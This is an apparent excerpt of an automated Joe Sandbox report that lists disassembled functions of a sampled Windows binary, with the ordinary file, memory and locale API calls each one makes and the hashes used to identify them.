• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
• String ID: D
• API String ID: 3356880605-2746444292
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
Strings
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: Message
• String ID: .tmp$y@
• API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp$y@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2987862817-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1658689577-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
